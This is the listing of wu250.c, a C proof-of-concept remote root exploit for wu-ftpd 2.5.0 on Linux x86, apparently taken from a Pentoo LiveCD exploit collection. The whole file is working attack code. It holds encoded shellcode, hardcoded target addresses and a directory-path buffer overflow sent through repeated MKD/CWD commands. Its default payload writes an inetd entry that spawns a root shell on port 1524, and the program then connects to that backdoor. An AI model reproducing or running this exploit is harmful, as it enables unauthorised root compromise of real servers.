home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ftp / wuftpd / wu250.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  11.6 KB  |  480 lines
  1. /*
  2.  *  Copyright (c) 1999 anathema <anathema@hack.co.za>. All rights reserved.
  3.  *                 ->  PRIVATE. DO NOT DISTRIBUTE.  <-
  4.  *
  5.  *  wu-ftpd 2.5.0 proof-of-concept remote root exploit (linux x86)
  6.  *  Tested against wu-ftpd2.5.0 default source compilation.
  7.  *
  8.  *  As we don't perform any error checking in ftp_login(), you should 
  9.  *  not specify an invalid username, password or initial directory.
  10.  *
  11.  *  You will need to obtain the correct offsets for each specific 
  12.  *  variant of wu-ftpd. Read the comments.
  13.  */
  14.  
  15. #include <stdio.h>
  16. #include <stdlib.h>
  17. #include <unistd.h>
  18. #include <ctype.h>
  19. #include <string.h>
  20. #include <stdarg.h>
  21. #include <fcntl.h>
  22. #include <memory.h>
  23. #include <sys/types.h>
  24. #include <sys/socket.h>
  25. #include <sys/time.h>
  26. #include <netinet/in.h>
  27. #include <arpa/inet.h>
  28. #include <netdb.h>
  29.  
  30. /*
  31.  *  You will almost certainly need to modify these for the specific
  32.  *  wu-ftpd you are attempting to exploit.
  33.  */
  34. #define ADDR_MAPPEDPATH        0x8067360
  35. #define ADDR_ERRCATCH_ST    0x8074f90
  36. #define ADDR_ERRCATCH_FI    0x8074fa4
  37.  
  38. /*
  39.  *  MAXPATHLEN is usually 1024.
  40.  */
  41. #define REMOTE_MAXPATHLEN    1024
  42.  
  43. #define FTP_PORT        21
  44. #define BD_PORT            1524
  45. #define RETPOS            255
  46. #define PRLEN            164
  47. /* #define VERBOSE */
  48.  
  49. /*
  50.  *  Function prototypes.
  51.  */
  52. u_long resolve_host(u_char *);
  53. void ftp_login(int, u_char *, u_char *, u_char *);
  54. void send_data(int, u_char *, ...);
  55. void recv_data(int, int);
  56. void exploit(int, u_char *, u_int, u_int, u_int);
  57. void surface_patterns(u_long);
  58. void euphoric(u_long, u_char *, u_char *, u_char *, u_short, u_short,
  59.               u_int, int, u_char *);
  60.  
  61. char c0de[] =
  62.   "\x29\xc0\x29\xdb\x29\xc9\xb0\x46\xcd\x80\xeb\x64\x5b\x89\xd9\x80\xc1\x0f\x39"
  63.   "\xd9\x7c\x06\x80\x29\x04\x49\xeb\xf6\x29\xc0\x88\x43\x01\x88\x43\x08\x88\x43"
  64.   "\x10\x87\xf3\xb0\x0c\x8d\x5e\x07\xcd\x80\xb0\x27\x8d\x1e\x29\xc9\xcd\x80\x29"
  65.   "\xc0\xb0\x3d\xcd\x80\x29\xc0\xb0\x0c\x8d\x5e\x02\xcd\x80\x29\xc0\x88\x46\x03"
  66.   "\xb0\x3d\x8d\x5e\x02\xcd\x80\x29\xc0\x8d\x5e\x09\x89\x5b\x08\x89\x43\x0c\x88"
  67.   "\x43\x07\x8d\x4b\x08\x8d\x53\x0c\xb0\x0b\xcd\x80\x29\xc0\x40\xcd\x80\xe8\x97"
  68.   "\xff\xff\xff\xff\xff\xff\x45\x45\x32\x32\x33\x32\x32\x33\x45\x33\x66\x6d\x72"
  69.   "\x33\x77\x6c";
  70.  
  71. u_long
  72. resolve_host(u_char *host_name)
  73. {
  74.   struct in_addr addr;
  75.   struct hostent *host_ent;
  76.  
  77.   addr.s_addr = inet_addr(host_name);
  78.   if (addr.s_addr == -1)
  79.     {
  80.       host_ent = gethostbyname(host_name);
  81.       if (!host_ent) return(0);
  82.       memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
  83.     }
  84.  
  85.   return(addr.s_addr);
  86. }
  87.  
  88. void
  89. ftp_login(int sock, u_char *user, u_char *pass, u_char *dir)
  90. {
  91.   recv_data(sock, 1);
  92.   send_data(sock, "USER %s\n", user);
  93.   send_data(sock, "PASS %s\n", pass);
  94.   send_data(sock, "CWD %s\n",  dir);
  95. }
  96.  
  97. void
  98. send_data(int sock, u_char *buf, ...)
  99. {
  100.   u_char  tmp_buf[4096];
  101.   va_list valist;
  102.  
  103.   memset(tmp_buf, 0, sizeof(tmp_buf));
  104.  
  105.   va_start(valist, buf);
  106.   vsnprintf(tmp_buf, sizeof(tmp_buf), buf, valist);
  107.  
  108. #ifdef VERBOSE
  109.   fprintf(stderr, "-> %s", tmp_buf);
  110. #endif /* VERBOSE */
  111.  
  112.   usleep(10000);
  113.   if (write(sock, tmp_buf, strlen(tmp_buf)) == -1)
  114.     {
  115.       perror("write");
  116.       close(sock);
  117.       exit(-1);
  118.     }
  119.  
  120.   va_end(valist);
  121.   recv_data(sock, 1);
  122. }
  123.  
  124. void
  125. recv_data(int sock, int disp)
  126. {
  127.   u_char tmp_buf[4096];
  128.  
  129.   usleep(10000);
  130.   memset(tmp_buf, 0, sizeof(tmp_buf));
  131.  
  132.   if (recv(sock, tmp_buf, sizeof(tmp_buf) - 1, 0) == -1)
  133.     {
  134.       if (disp)
  135.         {
  136.           perror("recv");
  137.           close(sock);
  138.           exit(-1);
  139.         }
  140.     }
  141.  
  142.   if (disp) fprintf(stderr, ": %s\n", tmp_buf);
  143. }
  144.  
  145. void
  146. exploit(int sock, u_char *pwd, u_int dir_len, u_int p_len, u_int align)
  147. {
  148.   u_long errcatch_st_addr = ADDR_ERRCATCH_ST;
  149.   u_long errcatch_fi_addr = ADDR_ERRCATCH_FI;
  150.   u_long mappedpath_addr  = ADDR_MAPPEDPATH;
  151.   u_long append_addr      = errcatch_st_addr;
  152.   u_char padding[4096];
  153.   u_char buf[25000];
  154.   u_int  fill_tr          = 0;
  155.   int i = 0, nl = 0;
  156.  
  157.   errcatch_st_addr -= p_len;
  158.   errcatch_fi_addr += p_len;
  159.   append_addr      += (p_len + align);
  160.   fill_tr           = REMOTE_MAXPATHLEN / (dir_len + p_len);
  161.  
  162. #ifdef VERBOSE
  163.   fprintf(stderr,
  164.           "fill_tr          == %d\n"
  165.           "errcatch_st_addr == 0x%lx && "
  166.           "errcatch_fi_addr == 0x%lx && "
  167.           "append_addr      == 0x%lx\n",
  168.           fill_tr, errcatch_st_addr, errcatch_fi_addr, append_addr);
  169. #endif /* VERBOSE */
  170.  
  171.   memset(buf, 0, sizeof(buf));
  172.   memset(padding, 0, sizeof(padding));
  173.   memset(padding, 0x90, RETPOS - (p_len + align));
  174.  
  175.   for (; i < fill_tr; i++)
  176.     {
  177.       send_data(sock, "MKD %s\n", padding);
  178.       send_data(sock, "CWD %s\n", padding);
  179.     }
  180.  
  181.   memset(padding, 0, sizeof(padding));
  182.   memcpy(padding, c0de, strlen(c0de));
  183.   padding[strlen(padding)+1] = 0;
  184.  
  185.   send_data(sock, "MKD %s\n", padding);
  186.   send_data(sock, "CWD %s\n", padding);
  187.  
  188.   memcpy(buf, "CWD ", 4);
  189.   memset(buf + 4, 0x90, strlen(padding));
  190.   append_addr += (dir_len + (84 - p_len));
  191.  
  192.   nl = strlen(buf) + 1;
  193.   for (i = nl; i < (nl + 84 - p_len); i += 4)
  194.     {
  195.       buf[i+0] = (errcatch_st_addr & 0xff);
  196.       buf[i+1] = (errcatch_st_addr >> 8) & 0xff;
  197.       buf[i+2] = (errcatch_st_addr >> 16) & 0xff;
  198.       buf[i+3] = (errcatch_st_addr >> 24) & 0xff;
  199.     }
  200.  
  201.   nl = strlen(buf) + 1;
  202.   for (i = nl; i < (nl + (p_len - dir_len)); i += 4)
  203.     {
  204.       buf[i+0] = (mappedpath_addr & 0xff);
  205.       buf[i+1] = (mappedpath_addr >> 8) & 0xff;
  206.       buf[i+2] = (mappedpath_addr >> 16) & 0xff;
  207.       buf[i+3] = (mappedpath_addr >> 24) & 0xff;
  208.     }
  209.  
  210.   i = strlen(buf) + 1;
  211.   buf[i++] = (errcatch_fi_addr & 0xff);
  212.   buf[i++] = (errcatch_fi_addr >> 8) & 0xff;
  213.   buf[i++] = (errcatch_fi_addr >> 16) & 0xff;
  214.   buf[i++] = (errcatch_fi_addr >> 24) & 0xff;
  215.  
  216.   nl = strlen(buf) + 1;
  217.   for (i = nl; i < (nl + 8); i += 4)
  218.     {
  219.       buf[i+0] = (append_addr & 0xff);
  220.       buf[i+1] = (append_addr >> 8) & 0xff;
  221.       buf[i+2] = (append_addr >> 16) & 0xff;
  222.       buf[i+3] = (append_addr >> 24) & 0xff;
  223.     }
  224.  
  225.   send_data(sock, "%s\n\n", buf);
  226. }
  227.  
  228. void
  229. surface_patterns(u_long dst_ip)
  230. {
  231.   struct sockaddr_in sin;
  232.   u_char sock_buf[4096];
  233.   fd_set fds;
  234.   int sock;
  235.  
  236.   fprintf(stderr, "Attempting to connect to backdoor..\n");
  237.   sleep(2);
  238.  
  239.   sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  240.   if (sock == -1)
  241.     {
  242.       perror("socket allocation");
  243.       exit(-1);
  244.     }
  245.  
  246.   sin.sin_family = AF_INET;
  247.   sin.sin_port   = htons(BD_PORT);
  248.   sin.sin_addr.s_addr = dst_ip;
  249.  
  250.   if (connect(sock, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1)
  251.     {
  252.       perror("connecting to backdoor");
  253.       close(sock);
  254.       exit(-1);
  255.     }
  256.  
  257.   fprintf(stderr, "owned\n");
  258.   for (;;)
  259.     {
  260.       FD_ZERO(&fds);
  261.       FD_SET(0, &fds); /* STDIN_FILENO */
  262.       FD_SET(sock, &fds);
  263.  
  264.       if (select(255, &fds, NULL, NULL, NULL) == -1)
  265.         {
  266.           perror("select");
  267.           close(sock);
  268.           exit(-1);
  269.         }
  270.  
  271.       memset(sock_buf, 0, sizeof(sock_buf));
  272.  
  273.       if (FD_ISSET(sock, &fds))
  274.         {
  275.           if (recv(sock, sock_buf, sizeof(sock_buf) - 1, 0) == -1)
  276.             {
  277.               fprintf(stderr, "Connection closed by foreign host.\n");
  278.               close(sock);
  279.               exit(0);
  280.             }
  281.  
  282.           fprintf(stderr, "%s", sock_buf);
  283.         }
  284.  
  285.       if (FD_ISSET(0, &fds)) /* STDIN_FILENO */
  286.         {
  287.           read(0, sock_buf, sizeof(sock_buf) - 1);
  288.           write(sock, sock_buf, strlen(sock_buf));
  289.         }
  290.     }
  291.  
  292.   /* NOTREACHED */
  293. }
  294.  
  295. void
  296. euphoric(u_long dst_ip, u_char *user, u_char *pass, u_char *dir,
  297.          u_short src_prt, u_short dst_prt, u_int align, int alt_cmd,
  298.          u_char *cmd)
  299. {
  300.   struct sockaddr_in sin;
  301.   struct in_addr inaddr;
  302.   u_int  dir_len;
  303.   int sock;
  304.  
  305.   dir_len = (u_int)strlen(dir);
  306.   sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  307.   if (sock == -1)
  308.     {
  309.       perror("socket allocation");
  310.       exit(-1);
  311.     }
  312.  
  313.   if (src_prt)
  314.     {
  315.       struct sockaddr_in min;
  316.       min.sin_family = AF_INET;
  317.       min.sin_port   = htons(src_prt);
  318.       min.sin_addr.s_addr = INADDR_ANY;
  319.  
  320.       if (bind(sock, (struct sockaddr *)&min, sizeof(struct sockaddr)) == -1)
  321.         {
  322.           perror("bind");
  323.           close(sock);
  324.           exit(-1);
  325.         }
  326.     }
  327.  
  328.   sin.sin_family = AF_INET;
  329.   sin.sin_port   = htons(dst_prt);
  330.   sin.sin_addr.s_addr = dst_ip;
  331.  
  332.   if (connect(sock, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1)
  333.     {
  334.       perror("connecting to ftp daemon");
  335.       close(sock);
  336.       exit(-1);
  337.     }
  338.  
  339.   inaddr.s_addr = dst_ip;
  340.   fprintf(stderr,
  341.           "\nAttacking target `%s`:\n Auth: [%s:%s]\n  Dir: [%s]\n",
  342.           inet_ntoa(inaddr), user, pass, dir);
  343.  
  344.   /*
  345.    *  Login to the FTP server.
  346.    *  No error checking is done here, so you should make sure
  347.    *  the login/pass/dir are valid before attempting to exploit.
  348.    */
  349.   ftp_login(sock, user, pass, dir);
  350.  
  351.   /*
  352.    *  The game starts here.
  353.    */
  354.   exploit(sock, dir, dir_len, (PRLEN + dir_len), align);
  355.  
  356.   /*
  357.    *  Now send the command we want executed to the FTP server.
  358.    */
  359.   send_data(sock, "%s\n", cmd);
  360.  
  361.   if (!alt_cmd)
  362.     {
  363.       /*
  364.        *  If the user hasn't specified an alternative command, make
  365.        *  the connection to the backdoor.
  366.  [2000]*/
  367.       surface_patterns(dst_ip);
  368.       /* NOTREACHED */
  369.     }
  370.  
  371.   sleep(2);
  372.   fprintf(stderr, "Completed.\n");
  373.   exit(0);
  374. }
  375.  
  376. void
  377. usage(u_char *nomenclature)
  378. {
  379.   fprintf(stderr,
  380.           "No.\nusage:\t%s dst_host|ip [ -u user ] [ -p pass ] [ -x dir ]\n\t"
  381.           "[ -s src_prt ] [ -d dst_prt ] [ -a align ] [ -c alt_cmd ]\n\n",
  382.           nomenclature);
  383.   exit(0);
  384. }
  385.  
  386. int
  387. main(int argc, char **argv)
  388. {
  389.   u_long  dst_ip      = 0;
  390.   u_short src_prt     = 0;
  391.   u_short dst_prt     = FTP_PORT;
  392.   u_int   align       = 0;
  393.   u_char  *user       = "ftp";
  394.   u_char  *pass       = "-rewt@broken";
  395.   u_char  *dir        = "incoming";
  396.   u_char  cmd[255];
  397.   int     opt         = 0;
  398.   int     alt_cmd     = 0;
  399.  
  400.   if (argc < 2)
  401.     {
  402.       usage(argv[0]);
  403.       /* NOTREACHED */
  404.     }
  405.  
  406.   dst_ip = resolve_host(argv[1]);
  407.   if (!dst_ip)
  408.     {
  409.       fprintf(stderr, "What kind of address is this: `%s`?\n", argv[1]);
  410.       exit(-1);
  411.     }
  412.  
  413.   memset(cmd, 0, sizeof(cmd));
  414.   while ((opt = getopt(argc, argv, "u:p:x:s:d:a:c:")) != EOF)
  415.     {
  416.       switch(opt)
  417.         {
  418.         case 'u':   /* username */
  419.           user = optarg;
  420.           break;
  421.         case 'p':   /* password */
  422.           pass = optarg;
  423.           break;
  424.         case 'x':   /* initial directory */
  425.           dir  = optarg;
  426.           break;
  427.         case 's':   /* source port */
  428.           src_prt = (u_short)atoi(optarg);
  429.           break;
  430.         case 'd':   /* alternative dest port */
  431.           dst_prt = (u_short)atoi(optarg);
  432.           break;
  433.         case 'a':   /* alignment */
  434.           align   = (u_int)atoi(optarg);
  435.           break;
  436.         case 'c':   /* alternative command */
  437.           strncpy(cmd, optarg, sizeof(cmd));
  438.           alt_cmd = 1;
  439.           break;
  440.         default:
  441.           usage(argv[0]);
  442.           /* NOTREACHED */
  443.         }
  444.     }
  445.  
  446.   if (src_prt < 1024)
  447.     {
  448.       /*
  449.        *  Must be root to bind() to a reserved source port.
  450.  [2000]*/
  451.       if (getuid() && geteuid())
  452.         {
  453.           fprintf(stderr, "Inadequate privileges\n");
  454.           exit(-1);
  455.         }
  456.     }
  457.  
  458.   if (!alt_cmd)
  459.     {
  460.       /*
  461.        *  Use the default command.
  462.        *  If used, the exploit will automatically spawn a remote shell.
  463.  [2000]*/
  464.       strcpy(cmd, "echo \"ingreslock stream tcp nowait root /bin/sh sh -i\" >/tmp/x; /usr/sbin/inetd /tmp/x\n");
  465.     }
  466.  
  467.   euphoric(dst_ip,     /* destination address */
  468.            user,        /* username */
  469.            pass,        /* password */
  470.            dir,         /* initial directory */
  471.            src_prt,     /* source port */
  472.            dst_prt,     /* destination port */
  473.            align,       /* alignment */
  474.            alt_cmd,     /* alternative command flag */
  475.            cmd);        /* command to execute */
  476.  
  477.   /* NOTREACHED */
  478. }
  479.  
  480. /*                    www.hack.co.za              [2000]*/